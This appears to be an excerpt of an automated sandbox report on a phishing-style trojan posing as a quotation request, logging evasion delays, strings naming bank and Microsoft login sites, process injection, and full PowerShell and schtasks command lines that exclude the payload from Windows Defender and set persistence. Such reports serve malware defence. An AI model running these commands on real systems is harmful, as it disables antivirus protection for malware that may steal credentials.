Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599558
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598451
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598316
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 598077
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 597093
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 596030
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595774
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595504
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594936
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594390
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Thread delayed: delay time: 594281

Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4515858199.000000000139E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4516378063.0000000001346000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Code function: 14_2_06DB9548 LdrInitializeThunk,

14_2_06DB9548

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Memory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Memory written: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Process created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
